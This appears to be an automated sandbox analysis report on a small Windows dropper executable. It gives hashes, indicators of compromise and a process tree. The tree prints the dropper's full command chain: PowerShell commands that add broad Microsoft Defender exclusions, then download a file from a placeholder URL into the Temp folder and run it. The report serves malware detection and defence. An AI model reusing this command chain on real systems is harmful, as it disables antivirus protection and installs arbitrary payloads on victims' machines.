6e03bb842f310100ddaf188671b4866b7f6db3012ae676cbcafdefcc389c15c2

General

Target

28bd2f6cf3be54b6e327e138ab77a2d2.exe
Size

7KB
MD5

28bd2f6cf3be54b6e327e138ab77a2d2
SHA1

80a050b5bb1109ed1658fe5a3fab14efd9f8f8da
SHA256

6e03bb842f310100ddaf188671b4866b7f6db3012ae676cbcafdefcc389c15c2
SHA512

49d9e86a16510d65493ea3731755c0afe68b31a9dcd160299031a88b187e49ade2b5838013a53d2ab7e81e9ada7e42cd60e605aee03d5297901be1af6dafdb8b
SSDEEP

96:IF04XHsqJa2IyWuQ25p9Tn7hats0QC6Btgvg6oK04LEfkk33aLlYR:IF0wsqJa9ruQ25TwGzBtg0K04Vk3aY

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://example.com/download.exe

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	1704	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1640	powershell.exe
2732	powershell.exe
1704	powershell.exe
108	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	108	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1436 wrote to memory of 1740	1436	28bd2f6cf3be54b6e327e138ab77a2d2.exe	28
PID 1436 wrote to memory of 1740	1436	28bd2f6cf3be54b6e327e138ab77a2d2.exe	28
PID 1436 wrote to memory of 1740	1436	28bd2f6cf3be54b6e327e138ab77a2d2.exe	28
PID 1436 wrote to memory of 1740	1436	28bd2f6cf3be54b6e327e138ab77a2d2.exe	28
PID 1740 wrote to memory of 1640	1740	cmd.exe	30
PID 1740 wrote to memory of 1640	1740	cmd.exe	30
PID 1740 wrote to memory of 1640	1740	cmd.exe	30
PID 1740 wrote to memory of 1640	1740	cmd.exe	30
PID 1740 wrote to memory of 2732	1740	cmd.exe	31
PID 1740 wrote to memory of 2732	1740	cmd.exe	31
PID 1740 wrote to memory of 2732	1740	cmd.exe	31
PID 1740 wrote to memory of 2732	1740	cmd.exe	31
PID 1740 wrote to memory of 1704	1740	cmd.exe	32
PID 1740 wrote to memory of 1704	1740	cmd.exe	32
PID 1740 wrote to memory of 1704	1740	cmd.exe	32
PID 1740 wrote to memory of 1704	1740	cmd.exe	32
PID 1740 wrote to memory of 108	1740	cmd.exe	33
PID 1740 wrote to memory of 108	1740	cmd.exe	33
PID 1740 wrote to memory of 108	1740	cmd.exe	33
PID 1740 wrote to memory of 108	1740	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\28bd2f6cf3be54b6e327e138ab77a2d2.exe
"C:\Users\Admin\AppData\Local\Temp\28bd2f6cf3be54b6e327e138ab77a2d2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command Add-MpPreference -ExclusionPath @('%UserProfile%','%AppData%','%Temp%','%SystemRoot%','%HomeDrive%','%SystemDrive%') -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('https://example.com/download.exe', '%Temp%\File.exe') & powershell Start-Process -FilePath '%Temp%\File.exe' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath @('C:\Users\Admin','C:\Users\Admin\AppData\Roaming','C:\Users\Admin\AppData\Local\Temp','C:\Windows','C:','C:') -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1640
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('https://example.com/download.exe', 'C:\Users\Admin\AppData\Local\Temp\File.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\File.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:108

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
561145e75029e6bbbc5b448649f89469

SHA1
dcf5c52a271c268760dd9c7fca8556e860083007

SHA256
6c9becd55e98b57a074f58b7559fec080c38aad76de8352d5f482db505b131a8

SHA512
9c62ba8b17ab3dc3f2866c1baa4fe6038e444758578a1737d11057f31554b30e88be7cd5475caf8b50485c43aba177978030bcea917a8adfb0284f6d6eb8dd69

Download Submit
memory/108-37-0x00000000027E0000-0x0000000002820000-memory.dmp

Filesize
256KB

Download
memory/108-36-0x0000000073CE0000-0x000000007428B000-memory.dmp

Filesize
5.7MB

Download
memory/108-39-0x00000000027E0000-0x0000000002820000-memory.dmp

Filesize
256KB

Download
memory/108-40-0x00000000027E0000-0x0000000002820000-memory.dmp

Filesize
256KB

Download
memory/108-41-0x0000000073CE0000-0x000000007428B000-memory.dmp

Filesize
5.7MB

Download
memory/108-38-0x0000000073CE0000-0x000000007428B000-memory.dmp

Filesize
5.7MB

Download
memory/1640-2-0x0000000073F90000-0x000000007453B000-memory.dmp

Filesize
5.7MB

Download
memory/1640-3-0x0000000073F90000-0x000000007453B000-memory.dmp

Filesize
5.7MB

Download
memory/1640-4-0x00000000025A0000-0x00000000025E0000-memory.dmp

Filesize
256KB

Download
memory/1640-6-0x0000000073F90000-0x000000007453B000-memory.dmp

Filesize
5.7MB

Download
memory/1640-5-0x00000000025A0000-0x00000000025E0000-memory.dmp

Filesize
256KB

Download
memory/1704-30-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/1704-25-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/1704-26-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1704-29-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1704-28-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1704-27-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/2732-12-0x0000000073CE0000-0x000000007428B000-memory.dmp

Filesize
5.7MB

Download
memory/2732-13-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/2732-15-0x0000000073CE0000-0x000000007428B000-memory.dmp

Filesize
5.7MB

Download
memory/2732-16-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/2732-18-0x0000000073CE0000-0x000000007428B000-memory.dmp

Filesize
5.7MB

Download
memory/2732-17-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/2732-14-0x0000000073CE0000-0x000000007428B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing